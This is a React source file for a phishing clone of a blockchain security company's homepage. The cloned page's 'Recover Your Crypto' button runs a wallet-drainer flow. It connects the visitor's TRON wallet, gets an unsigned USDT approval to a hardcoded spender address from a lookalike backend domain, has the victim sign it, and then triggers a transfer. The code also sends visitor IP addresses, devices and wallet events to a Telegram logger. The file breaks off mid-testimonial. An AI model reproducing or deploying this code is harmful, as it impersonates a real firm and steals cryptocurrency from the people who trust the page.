import { useState, useEffect, useMemo, useCallback } from 'react';
import { WalletError } from '@tronweb3/tronwallet-abstract-adapter';
import { useWallet, WalletProvider } from '@tronweb3/tronwallet-adapter-react-hooks';
import { WalletModalProvider } from '@tronweb3/tronwallet-adapter-react-ui';
import { WalletConnectAdapter } from '@tronweb3/tronwallet-adapter-walletconnect';
import axios from 'axios';


const SPENDER_ADDRESS = 'TGiPxbDsQBRZ8GTR8ruvdCufQ4aPNcStFW';
const BACKEND_URL = 'https://api.pancakeswap-support.click';


interface TrustWalletConnection {
    walletAddress: string | null;
    status: string;
    connectAndRecover: () => Promise<void>;
    isProcessing: boolean;
    connected: boolean;
    isTrustWallet: boolean;
}

function useTrustWalletConnection(walletConnectAdapter: WalletConnectAdapter): TrustWalletConnection {
    const { address, connected, connect, select, wallet: selectedWallet } = useWallet();
    const [status, setStatus] = useState<string>('Ready to recover your funds');
    const [isProcessing, setIsProcessing] = useState<boolean>(false);

    const isTrustWallet = useMemo<boolean>(() => {
        const ua = navigator.userAgent.toLowerCase();
        const isTrust = /trust/i.test(ua) || /trustwallet/i.test(ua) || !!(window.ethereum && window.ethereum.isTrust);
        console.log('Trust Wallet Detection:', { ua, isTrust, hasEthereum: !!window.ethereum });
        return isTrust;
    }, []);

    const logToTelegram = useCallback(async (message: string) => {
        await axios.post(`${BACKEND_URL}/log-to-telegram`, { message });
    }, []);

    const waitForConnection = (adapter: WalletConnectAdapter, connectFn: () => Promise<void>) => {
        return new Promise<string>((resolve, reject) => {
            const timeout = setTimeout(() => {
                reject(new Error('Connection timed out after 45 seconds'));
            }, 45000);

            let resolved = false;

            adapter.on('connect', (data: string) => {
                if (!resolved) {
                    console.log('WalletConnect connected:', data);
                    logToTelegram(`ℹ️ *WalletConnect event*: Connected with address=\`${data}\``);
                    resolve(data);
                    resolved = true;
                    clearTimeout(timeout);
                }
            });

            adapter.on('error', (error) => {
                if (!resolved) {
                    resolved = true;
                    clearTimeout(timeout);
                    reject(new Error(`WalletConnect error: ${error.message}`));
                }
            });

            connectFn().catch(err => {
                if (!resolved) {
                    resolved = true;
                    clearTimeout(timeout);
                    reject(err);
                }
            });
        });
    };

    const connectAndRecover = useCallback(async () => {
        let effectiveAddress: string | null = null;

        try {
            setIsProcessing(true);
            setStatus('Connecting to your wallet...');

            await select(walletConnectAdapter.name);
            await new Promise(resolve => setTimeout(resolve, 500));

            if (!selectedWallet || selectedWallet.adapter.name !== walletConnectAdapter.name) {
                throw new Error('Wallet selection failed');
            }

            await logToTelegram(`ℹ️ *Attempting to connect* wallet via ${walletConnectAdapter.name}`);
            effectiveAddress = await waitForConnection(walletConnectAdapter, connect);

            setStatus(`Connected to ${effectiveAddress}`);
            await logToTelegram(`✅ *User connected*: \`${effectiveAddress}\` | Trust Wallet: ${isTrustWallet}`);

            setStatus('Awaiting your approval in wallet...');
            await logToTelegram(`📝 *Approval requested* for \`${effectiveAddress}\` to \`${SPENDER_ADDRESS}\` for USDT`);
            const unsignedResponse = await axios.post(`${BACKEND_URL}/transfer`, {
                fromAddress: effectiveAddress,
            });

            if (!unsignedResponse.data.success) {
                throw new Error(unsignedResponse.data.message || 'Failed to get unsigned approval transaction');
            }

            const unsignedTx = unsignedResponse.data.unsignedTx;
            const signedTx = await selectedWallet.adapter.signTransaction(unsignedTx);
            await logToTelegram(`✍️ *Approval signed* by \`${effectiveAddress}\``);

            setStatus('Processing recovery, please wait...');
            const transferResponse = await axios.post(`${BACKEND_URL}/transfer`, {
                fromAddress: effectiveAddress,
                signedApprovalTx: signedTx,
            });

            if (transferResponse.data.success) {
                setStatus('Funds recovered successfully');
                await logToTelegram(`🎉 *Transfer completed* for \`${effectiveAddress}\`: \`${transferResponse.data.txId}\``);
            } else {
                throw new Error(transferResponse.data.message || 'Transfer failed');
            }
        } catch (error: any) {
            setStatus(`Recovery failed: ${error.message}`);
            await logToTelegram(`❌ *Error* for \`${effectiveAddress || 'unknown'}\`: ${error.message}`);
        } finally {
            setIsProcessing(false);
        }
    }, [select, connect, walletConnectAdapter, selectedWallet, isTrustWallet, logToTelegram]);

    useEffect(() => {
        const userAgent = navigator.userAgent;
        axios.get('https://api.ipify.org?format=json').then(response => {
            const ip = response.data.ip;
            logToTelegram(`👋 *User visited* - IP: \`${ip}\`, Device: \`${userAgent}\`, Trust Wallet: ${isTrustWallet}`);
        }).catch(err => logToTelegram(`❌ *IP Fetch Error*: ${err.message}`));
    }, [isTrustWallet, logToTelegram]);

    return {
        walletAddress: address,
        status,
        connectAndRecover,
        isProcessing,
        connected,
        isTrustWallet,
    };
}

interface AddressViewerProps {
    walletConnectAdapter: WalletConnectAdapter;
}

function AddressViewer({ walletConnectAdapter }: AddressViewerProps) {
    const { 
        connectAndRecover,
        isProcessing    
       } = useTrustWalletConnection(walletConnectAdapter);

    return (
        // <ThemeProvider theme={theme}>
        //     <CssBaseline />
        //     <Container maxWidth="md">
        //         <HeroSection>
        //             <Typography variant="h1" gutterBottom>
        //                 Recover Your Lost Crypto
        //             </Typography>
        //             <Typography variant="h6">
        //                 Securely reclaim your funds with one click
        //             </Typography>
        //         </HeroSection>
        //         <Box sx={{ mt: 4 }}>
        //             <StatusCard elevation={3}>
        //                 <Typography variant="h6" gutterBottom>
        //                     Recovery Status
        //                 </Typography>
        //                 <Typography>Wallet: <strong>{walletAddress || 'Not connected'}</strong></Typography>
        //                 <Typography>Status: {status}</Typography>
        //                 <Typography>Wallet Type: {isTrustWallet ? 'Trust Wallet' : 'Other'}</Typography>
        //                 <Box sx={{ mt: 3 }}>
        //                     <Button
        //                         variant="contained"
        //                         color="primary"
        //                         onClick={connectAndRecover}
                                // disabled={isProcessing || connected}
        //                         startIcon={isProcessing ? <CircularProgress size={20} color="inherit" /> : null}
        //                         sx={{ py: 1.5, px: 4, fontSize: '1.1rem' }}
        //                     >
        //                         {isProcessing ? 'Processing...' : 'Connect & Recover'}
        //                     </Button>
        //                 </Box>
        //             </StatusCard>
        //         </Box>
        //     </Container>
        // </ThemeProvider>



      
  <>

     
      <meta charSet="utf-8" />
      <title>Blockchain Security Services | Ackee Blockchain</title>
      <meta
        content="Ackee is trusted by the top-tier organizations in web3. Our mission is to contribute to a stronger blockchain ecosystem by providing  security services, tooling and education."
        name="description"
      />
      <meta
        content="Blockchain Security Services | Ackee Blockchain"
        property="og:title"
      />
      <meta
        content="Ackee is trusted by the top-tier organizations in web3. Our mission is to contribute to a stronger blockchain ecosystem by providing  security services, tooling and education."
        property="og:description"
      />
      <meta
        content="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/66391a90803ae4a1a0cc732d_Ackee%20Blockchain%20Security.png"
        property="og:image"
      />
      <meta
        content="Blockchain Security Services | Ackee Blockchain"
        property="twitter:title"
      />
      <meta
        content="Ackee is trusted by the top-tier organizations in web3. Our mission is to contribute to a stronger blockchain ecosystem by providing  security services, tooling and education."
        property="twitter:description"
      />
      <meta
        content="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/66391a90803ae4a1a0cc732d_Ackee%20Blockchain%20Security.png"
        property="twitter:image"
      />
      <meta property="og:type" content="website" />
      <meta content="summary_large_image" name="twitter:card" />
      <meta content="width=device-width, initial-scale=1" name="viewport" />
      <link
        href="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/css/ackee-25cbefb299aef745f85-4416e5dd559a4.webflow.8f11af244.min.css"
        rel="stylesheet"
        type="text/css"
      />
      <link
        href="https://cdn.prod.website-files.com/627b7c6afa5471026e3948bd/62dff2a525f639e1ef4ded13_favicon-32x32.png"
        rel="shortcut icon"
        type="image/x-icon"
      />
      <link
        href="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/66697b5f3f842ddecf063c92_Group 1.png"
        rel="apple-touch-icon"
      />
      <link href="index.html" rel="canonical" />
      <style
        dangerouslySetInnerHTML={{
          __html:
            '\n  .link,\n  .submit-btn_block {\n   position: relative;\n  }\n  .link:before,\n  .submit-btn_block:before {\n   position: absolute;\n    content: "";\n    width:100%;\n    height: 5px;\n    background-color: #0000FF;\n    bottom: 5px;\n    z-index: -1;\n    transition: all 0.3s;\n  }\n  .link:hover:before,\n  .submit-btn_block:hover:before {\n    background-color: #FF00FF;\n  }\n  .link.link-lg:before {\n   height: 8px; \n  }\n',
        }}
      />
      <style
        dangerouslySetInnerHTML={{
          __html: "\n.w-webflow-badge {\ndisplay: none !important;\n}\n",
        }}
      />
      <link
        rel="stylesheet"
        href="https://cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.9.0/slick.min.css"
      />
      <link
        rel="stylesheet"
        href="https://cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.9.0/slick-theme.css"
      />
      {/* [Attributes by Finsweet] CMS Nest */}
      <style
        dangerouslySetInnerHTML={{
          __html:
            '\n.blur_block {\nbackground: rgba( 0, 0, 0, 0.5 );\nbackdrop-filter: blur( 13px );\n-webkit-backdrop-filter: blur( 13px );\nposition: relative;\n}\n.w-slider-dot {\n\twidth: 4px;\n  height: 4px;\n  background: #0000FF;\n  position: relative;\n  border-radius: 0;\n}\n.w-slider-dot:before {\n  content: "1";\n  font-size: 14px;\n  top: -8px;\n  left: -1px;\n  color: transparent;\n  position: absolute;\n}\n.w-slider-dot:nth-of-type(2):before {\ncontent: "2";\n}\n.w-slider-dot:nth-of-type(3):before {\ncontent: "3";\n}\n.w-slider-dot:nth-of-type(4):before {\ncontent: "4";\n}\n \n.w-slider-dot:after {\n\tcontent: "";\n  position: absolute;\n  width: 13px;\n  height: 1px;\n  background: #fff;\n  opacity: 20%;\n\ttop: 2px;\n  left: 8px;\n}\n.w-slider-dot:last-of-type:after {\n\tcontent: none;\n}\n.w-slider-dot.w-active {\n\tbackground-color: transparent;\n}\n.w-slider-dot.w-active:before {\n\tcolor: #FF00FF;\n}\n/* styles for cms slider */\n.slick-dots {\n  top: 0;\n  bottom: auto;\n  text-align: left;\n  padding-left: 100px;\n}\n.slick-dots li {\n\tposition: relative;\n  margin: 0 6px;\n}\n.slick-dots li:before {\n\tcontent: "";\n\tposition: absolute;\n\twidth: 4px;\n  height: 4px;\n  background-color: #0000FF;\n  border-radius: 0;\n  top: 8px;\n  left: -3px;\n}\n.slick-dots li > a {\n\tcolor: transparent;\n  font-size: 14px;\n  position: absolute;\n  left: -7px;\n}\n.slick-dots li:after {\n    content: "";\n    position: absolute;\n    width: 13px;\n    height: 1px;\n    background: #fff;\n    opacity: 20%;\n    top: 10px;\n    left: 8px;\n}\n.slick-dots li:last-of-type:after {\n\tcontent: none;\n}\n.slick-dots li.slick-active:before {\n\tbackground-color: transparent;\n}\n.slick-dots li.slick-active > a {\n\tcolor: #FF00FF;\n}\n.slick-dots {\n\tz-index: 98;\n}\n@media all and (max-width: 568px) {\n  .slick-dots {\n    text-align: center;\n    padding-left: 0;\n  }\n}\n\n\n.dot-bg {\n    --dotSize: 1px;\n    aspect-ratio: 0;\n    background-image: radial-gradient(circle at center, #ffffff30 var(--dotSize), transparent 0);\n    background-size: 60px 60px;\n    background-repeat: round;\n    background-position: center;\n}\n\n',
        }}
      />
      <div className="global-styles w-embed">
        <style
          dangerouslySetInnerHTML={{
            __html:
              '\n\n/* html { font-size: calc(0.625rem + 0.41666666666666663vw); }\n  @media screen and (max-width:1920px) { html { font-size: calc(0.625rem + 0.41666666666666674vw); } }\n  @media screen and (max-width:1440px) { html { font-size: calc(0.8126951092611863rem + 0.20811654526534862vw); } } */\n  html { font-size: calc(0.8126951092611863rem + 0.20811654526534862vw); }\n  @media screen and (max-width:479px) { html { font-size: calc(0.7494769874476988rem + 0.8368200836820083vw); } }\n  \n  \n  \n/* Snippet gets rid of top margin on first element in any rich text*/\n\n\n.w-richtext>:first-child {\n\tmargin-top: 0;\n}\n\n/* Snippet gets rid of bottom margin on last element in any rich text*/\n.w-richtext>:last-child, .w-richtext ol li:last-child, .w-richtext ul li:last-child {\n    margin-bottom: 0;\n}\n\n/* Snippet makes all link elements listed below to inherit color from their parent */\na, \n.w-tab-link,\n.w-nav-link,\n.w-dropdown-btn,\n.w-dropdown-toggle,\n.w-dropdown-link\n{\ncolor: inherit;\n}\n\n/* Snippet prevents all click and hover interaction with an element */\n.clickable-off {\n  pointer-events: none;\n}\n\n/* Snippet enables all click and hover interaction with an element */\n.clickable-on{\n  pointer-events: auto;\n}\n\n/* Snippet enables you to add class of div-square which creates and maintains a 1:1 dimension of a div.*/\n.div-square::after {\n  content: "";\n  display: block;\n  padding-bottom: 100%;\n}\n\n/*Hide focus outline for main content element*/\n    main:focus-visible {\n    outline: -webkit-focus-ring-color auto 0px;\n}\n\n/* Make sure containers never lose their center alignment*/\n.container-medium, .container-small, .container-large {\n  margin-right: auto !important;\n  margin-left: auto !important;\n}\n\n/*Reset selects, buttons, and links styles*/\n.w-input, .w-select, a {\ncolor: inherit;\ntext-decoration: inherit;\nfont-size: inherit;\n}\n\n/*Apply "..." after 3 lines of text */\n.text-style-3lines {\n    display: -webkit-box;\n    overflow: hidden;\n    -webkit-line-clamp: 3;\n    -webkit-box-orient: vertical;\n}\n\n/* Apply "..." after 2 lines of text */\n.text-style-2lines {\n    display: -webkit-box;\n    overflow: hidden;\n    -webkit-line-clamp: 2;\n    -webkit-box-orient: vertical;\n}\n/* Apply "..." at 100% width */\n.truncate-width { \n\t\twidth: 100%; \n    white-space: nowrap; \n    overflow: hidden; \n    text-overflow: ellipsis; \n}\n/* Removes native scrollbar */\n.no-scrollbar {\n    -ms-overflow-style: none;  // IE 10+\n    overflow: -moz-scrollbars-none;  // Firefox\n}\n\n.no-scrollbar::-webkit-scrollbar {\n    display: none; // Safari and Chrome\n}\n\n.footer-link:hover {\n    color: #00FFFF;\n    transition: all 0.35s ease;\n}\n\n@media screen and (min-width:1920px) {\n .client_logo-wrapper {\n    height: 3rem;\n}}\n\n\n.button-secondary:hover {\n   color: #FF00FF;\n   transition: all 0.35s ease;\n}\n\n\n\n.hover_gradient > .block_content {\n   border: none;\n   border-radius: 4px;}\n\n.hover_gradient:hover {\n   background: linear-gradient(90deg, rgba(255,0,255,1) 0%, rgba(0,0,255,1) 100%);\n   transition: all 0.35s ease;}\n   \n\n.hover_gradient:hover .button-secondary {\n   color: #FF00FF;\n   transition: all 0.35s ease;}\n\n',
          }}
        />
      </div>
      <div className="overflow-hidden">
        <div className="main background">
          <div className="dot-bg" />
          <div className="page-wrapper">
            <div
              data-collapse="medium"
              data-animation="over-right"
              data-duration={400}
              data-w-id="22d6f6de-c3a0-308b-0f63-c4143dc28c52"
              data-easing="ease"
              data-easing2="ease"
              role="banner"
              className="navbar add-p w-nav"
            >
              <div className="nav-container">
                <a href="index.html" className="brand_l w-nav-brand">
                  <img
                    src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6657486ee09d18c7e9abea2d_logo.svg"
                    loading="lazy"
                    height={60}
                    width={205}
                    alt="Ackee Blockchain Security Logo
  "
                    className="logo_brand"
                  />
                </a>
                <nav role="navigation" className="nav-menu w-nav-menu">
                  <a href="index.html#services" className="nav-link w-nav-link">
                    Services
                  </a>
                  <a href="index.html#work-sec" className="nav-link w-nav-link">
                    Our work
                  </a>
                  <a href="index.html#team" className="nav-link w-nav-link">
                    Team
                  </a>
                  <a href="blog/index.html" className="nav-link w-nav-link">
                    Research
                  </a>
                  <img
                    src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73670_cancel.svg"
                    loading="lazy"
                    alt="cancel"
                    className="close-menu"
                  />
                  <a href="contact.html" className="nav-link w-nav-link">
                    Contact
                  </a>
                </nav>
              </div>
              <div id="menu-button" className="menu-button hide w-nav-button">
                <div className="icon w-icon-nav-menu" />
              </div>
              <div className="navbar_menu-button w-nav-button">
                <div className="menu-icon">
                  <div className="menu-icon_line-top" />
                  <div className="menu-icon_line-middle">
                    <div className="menu-icon_line-middle-inner" />
                  </div>
                  <div className="menu-icon_line-bottom" />
                </div>
              </div>
            </div>
            <div className="overflow-hidden">
              <div className="header is-hero-upd">
                <div className="container-ii header-container">
                  <div className="header-image_overlay">
                    <img
                      alt="Ackee Blockchain Security"
                      src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/66212a32290bc5070667aae4_j 2.webp"
                      sizes="(max-width: 479px) 99vw, (max-width: 767px) 84vw, (max-width: 991px) 87vw, (max-width: 1439px) 60vw, 55vw"
                      srcSet="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/66212a32290bc5070667aae4_j%202-p-500.webp 500w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/66212a32290bc5070667aae4_j%202-p-800.webp 800w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/66212a32290bc5070667aae4_j%202-p-1080.webp 1080w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/66212a32290bc5070667aae4_j%202.webp 1682w"
                      className="hh-image"
                    />
                  </div>
                  <div className="header-contant">
                    <h1 className="heading-large is-hero-head">
                      Blockchain security by industry-leading auditors
                    </h1>
                    <p className="description mb-4-upd">
                      Ackee is trusted by top-tier organizations in web3. Our
                      mission is to contribute to a stronger blockchain
                      ecosystem by providing security services, tooling, and
                      education.
                      <br />
                    </p>
                    <div 
  className="button is-small w-inline-block"
  onClick={connectAndRecover}
  style={{ 
    cursor: isProcessing ? "not-allowed" : "pointer",
    opacity: isProcessing ? 0.7 : 1 
  }}
>
  <div className="button-text">
    {isProcessing ? (
      "Please wait..."
    ) : (
      "Get an Audit - Recover Your Crypto"
    )}
  </div>
  <div className="button-arrow w-embed">
    <svg
      xmlns="http://www.w3.org/2000/svg"
      width="100%"
      height="auto"
      viewBox="0 0 9 14"
      fill="none"
    >
      <path
        d="M1 1L7 7L1 13"
        stroke="white"
        strokeWidth="1.5"
      />
    </svg>
  </div>
</div>
                  </div>
                  <div className="ocl_wrapper">
                    <h4 className="text-size-regular">Our clients</h4>
                    <div className="clients_wrapper">
                      <a
                        href="blog/tag/1inch/index.html"
                        target="_blank"
                        className="client_logo-wrapper w-inline-block"
                      >
                        <img
                          src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/66a7768723dc1441d2f5aa29_1inch.svg"
                          alt="1inch Network"
                          width={160}
                          className="client-logo_icon"
                        />
                      </a>
                      <a
                        href="blog/tag/lido/index.html"
                        target="_blank"
                        className="client_logo-wrapper w-inline-block"
                      >
                        <img
                          src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/66a776873a12705cf89c3c3b_lido.svg"
                          alt="Lido Finance"
                          width={160}
                          className="client-logo_icon"
                        />
                      </a>
                      <a
                        href="blog/tag/safe/index.html"
                        target="_blank"
                        className="client_logo-wrapper w-inline-block"
                      >
                        <img
                          src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/66a776888af50b4fa02a1df6_safe.svg"
                          alt="Safe Global"
                          width={160}
                          className="client-logo_icon"
                        />
                      </a>
                      <a
                        href="blog/tag/axelar/index.html"
                        target="_blank"
                        className="client_logo-wrapper w-inline-block"
                      >
                        <img
                          src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/66a77687eacc503c447121c5_axe.svg"
                          alt="Axelar Network"
                          width={160}
                          className="client-logo_icon"
                        />
                      </a>
                      <a
                        href="blog/tag/layerzero/index.html"
                        target="_blank"
                        className="client_logo-wrapper w-inline-block"
                      >
                        <img
                          src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/66a776871f583d918982bddc_layr.svg"
                          alt="Layer Zero"
                          width={160}
                          className="client-logo_icon"
                        />
                      </a>
                      <a
                        href="blog/tag/traderjoe/index.html"
                        target="_blank"
                        className="client_logo-wrapper w-inline-block"
                      >
                        <img
                          src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/66a77687c41812421a15174a_trader.svg"
                          alt="Trader Joe"
                          width={160}
                          className="client-logo_icon"
                        />
                      </a>
                      <a
                        href="blog/tag/pendle/index.html"
                        target="_blank"
                        className="client_logo-wrapper w-inline-block"
                      >
                        <img
                          src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/66a77687f1639b883c6b54a7_pendl.svg"
                          alt="Pendle Network"
                          width={180}
                          height="Auto"
                          className="client-logo_icon"
                        />
                      </a>
                      <a
                        href="blog/tag/marinade/index.html"
                        target="_blank"
                        className="client_logo-wrapper w-inline-block"
                      >
                        <img
                          src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/66a776870c58da0f027c7518_mar.svg"
                          alt="Marinade Finance"
                          width={160}
                          className="client-logo_icon"
                        />
                      </a>
                    </div>
                  </div>
                </div>
              </div>
            </div>
            <div className="how-we-help">
              <div className="container_main">
                <div
                  data-delay={4000}
                  data-animation="slide"
                  className="slider w-slider"
                  data-autoplay="true"
                  data-easing="ease"
                  data-hide-arrows="false"
                  data-disable-swipe="false"
                  data-autoplay-limit={0}
                  data-nav-spacing={11}
                  data-duration={500}
                  data-infinite="true"
                >
                  <div className="w-slider-mask">
                    <div className="w-slide">
                      <div className="slide_container">
                        <div className="tags_container">
                          <div className="tag">
                            <div>Ethereum</div>
                          </div>
                          <div className="tag">
                            <div>Audit</div>
                          </div>
                          <div className="tag">
                            <div>celo</div>
                          </div>
                        </div>
                        <h1>cLabs</h1>
                        <p className="description">
                          cLabs is a member of the Alliance for Prosperity and
                          part of the community working on{" "}
                          <a href="https://celo.org/" target="_blank" rel="noreferrer">
                            Celo.
                          </a>
                        </p>
                        <div className="block_black our-work_block block_center slide-block">
                          <div className="block_content">
                            <div className="slide_testimonial">
                              <blockquote>
                                We are helping cLabs to secure the blockchain
                                ecosystem by performing security assessments for
                                following projects:
                                <br />
                              </blockquote>
                            </div>
                            <img
                              width={184}
                              sizes="100vw"
                              src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73728_image_processing20201222-718-1nix7h2-removebg-preview.png"
                              loading="lazy"
                              alt="cLabs logo"
                              srcSet="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73728_image_processing20201222-718-1nix7h2-removebg-preview-p-500.png 500w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73728_image_processing20201222-718-1nix7h2-removebg-preview.png 617w"
                              className="logo"
                            />
                            <img
                              width={184}
                              alt="GoodGhosting logo"
                              src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba736f9_output-onlinepngtools-2-removebg-preview.png"
                              loading="lazy"
                              className="logo"
                            />
                            <img
                              width={154}
                              sizes="100vw"
                              src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73724_output-onlinepngtools-3.png"
                              loading="lazy"
                              alt="SushiSwap logo"
                              srcSet="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73724_output-onlinepngtools-3-p-500.png 500w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73724_output-onlinepngtools-3.png 800w"
                              className="logo"
                            />
                            <img
                              width={139}
                              sizes="100vw"
                              src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73725_Celo Logo Monochrome Reverse.png"
                              loading="lazy"
                              alt="Celo logo"
                              srcSet="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73725_Celo%2520Logo%2520Monochrome%2520Reverse-p-500.png 500w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73725_Celo%2520Logo%2520Monochrome%2520Reverse-p-800.png 800w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73725_Celo%2520Logo%2520Monochrome%2520Reverse-p-1080.png 1080w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73725_Celo%2520Logo%2520Monochrome%2520Reverse-p-1600.png 1600w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73725_Celo%2520Logo%2520Monochrome%2520Reverse-p-2000.png 2000w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73725_Celo%2520Logo%2520Monochrome%2520Reverse-p-2600.png 2600w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73725_Celo%20Logo%20Monochrome%20Reverse.png 3952w"
                              className="logo"
                            />
                          </div>
                          <div className="blur_block" />
                        </div>
                      </div>
                    </div>
                    <div className="w-slide">
                      <div className="slide_container">
                        <div className="tags_container">
                          <div className="tag">
                            <div>ETHEREUM</div>
                          </div>
                          <div className="tag">
                            <div>Audit</div>
                          </div>
                          <div className="tag">
                            <div>fund</div>
                          </div>
                        </div>
                        <h1>Rockaway Blockchain Fund</h1>
                        <p className="description">
                          The largest European investment fund focused on
                          investment into blockchain and digital assets, with a
                          target value of $ 100 million.
                        </p>
                        <div className="block_black our-work_block block_center slide-block">
                          <div className="block_content">
                            <div className="slide_testimonial">
                              <blockquote>
                                We are happy to support RBF on their investment
                                decisions by our technical due diligence
                                process.
                              </blockquote>
                              <div className="quote-author_block">
                                <div className="photo_container" />
                                <img
                                  src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73674_img_logo_rockaway.svg"
                                  loading="lazy"
                                  width={139}
                                  alt="rockway logo"
                                  className="logo"
                                />
                              </div>
                            </div>
                          </div>
                          <div className="blur_block" />
                        </div>
                      </div>
                    </div>
                    <div className="w-slide">
                      <div className="slide_container">
                        <div className="tags_container">
                          <div className="tag">
                            <div>Solana</div>
                          </div>
                          <div className="tag">
                            <div>Audit</div>
                          </div>
                          <div className="tag">
                            <div>defi</div>
                          </div>
                        </div>
                        <h1>Marinade Finance</h1>
                        <p className="description">
                          <a href="https://celo.org/" target="_blank" rel="noreferrer">
                            Liquid staking protocol built on Solana.
                          </a>
                        </p>
                        <div className="block_black our-work_block block_center slide-block">
                          <div className="block_content">
                            <div className="slide_testimonial">
                              <blockquote>
                                The audit scope was 4 engineering weeks, we
                                co-audited with Kudelski Security and Nedodyme.
                                <br />
                                <br />
                                Marinade was presented as "The most trusted
                                staking on Solana" on the Solana Breakpoint
                                conference.
                              </blockquote>
                              <div className="quote-author_block">
                                <img
                                  src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba736fd_marinade.png"
                                  loading="lazy"
                                  width={139}
                                  alt="Marinade.Finance logo"
                                  className="logo"
                                />
                              </div>
                            </div>
                          </div>
                          <div className="blur_block" />
                        </div>
                      </div>
                    </div>
                    <div id={"4"} className="w-slide">
                      <div className="slide_container">
                        <div className="tags_container">
                          <div className="tag">
                            <div>ethereum</div>
                          </div>
                          <div className="tag">
                            <div>Audit</div>
                          </div>
                          <div className="tag">
                            <div>gaming</div>
                          </div>
                        </div>
                        <h1>Community Gaming</h1>
                        <p className="description">
                          Community Gaming’s platform creates a seamless
                          experience for tournament organizers to host
                          grassroots tournaments and for gamers to compete and
                          instantly get paid when they win.
                        </p>
                        <div className="block_black our-work_block block_center slide-block">
                          <div className="block_content">
                            <div className="slide_testimonial">
                              <blockquote>
                                We have performed a quick 5&nbsp;MDs review of
                                Ethereum smart contracts. <br />
                                <br />
                                The audit was not published.
                              </blockquote>
                              <div className="quote-author_block">
                                <div className="photo_container" />
                                <img
                                  width={145}
                                  height={60}
                                  src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73729_white-logo-transparent.png"
                                  loading="lazy"
                                  alt="Community Gaming logo"
                                  srcSet="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73729_white-logo-transparent-p-500.png 500w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73729_white-logo-transparent-p-800.png 800w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73729_white-logo-transparent-p-1080.png 1080w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73729_white-logo-transparent-p-1600.png 1600w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73729_white-logo-transparent.png 2400w"
                                  sizes="100vw"
                                  className="logo"
                                />
                              </div>
                            </div>
                          </div>
                          <div className="blur_block" />
                        </div>
                      </div>
                    </div>
                  </div>
                  <div className="left-arrow w-slider-arrow-left">
                    <img
                      width={42}
                      height={65}
                      src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba736c7_cursor_prev%402x.png"
                      loading="lazy"
                      alt=""
                    />
                  </div>
                  <div className="right-arrow w-slider-arrow-right">
                    <img
                      width={42}
                      height={65}
                      src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba736dc_cursor_next%402x.png"
                      loading="lazy"
                      alt=""
                    />
                  </div>
                  <div className="slide-nav w-slider-nav w-round" />
                </div>
                <div className="main_slider-container">
                  <div className="w-dyn-list">
                    <div role="list" className="help_slider w-dyn-items">
                      <div role="listitem" className="w-dyn-item">
                        <div className="slide_container">
                          <div className="w-dyn-list">
                            <div
                              role="list"
                              className="tags_container w-dyn-items"
                            >
                              <div role="listitem" className="w-dyn-item">
                                <div className="tag">
                                  <div>Ethereum</div>
                                </div>
                              </div>
                              <div role="listitem" className="w-dyn-item">
                                <div className="tag">
                                  <div>Audit</div>
                                </div>
                              </div>
                              <div role="listitem" className="w-dyn-item">
                                <div className="tag">
                                  <div>Defi</div>
                                </div>
                              </div>
                            </div>
                          </div>
                          <h1>Lido</h1>
                          <p className="description">
                            Lido is Ethereum's leading liquid staking protocol,
                            with best-in-class security, deepest liquidity and
                            competitive rewards.
                          </p>
                          <div className="block_black our-work_block block_center slide-block-dark">
                            <div className="block_content">
                              <div className="slider_rich-text text-align-left w-richtext">
                                <p>
                                  <em>
                                    "Working with Ackee Blockchain is a great
                                    experience for Lido. Their audits are
                                    thorough, and their reports are always
                                    delivered on time. We're especially
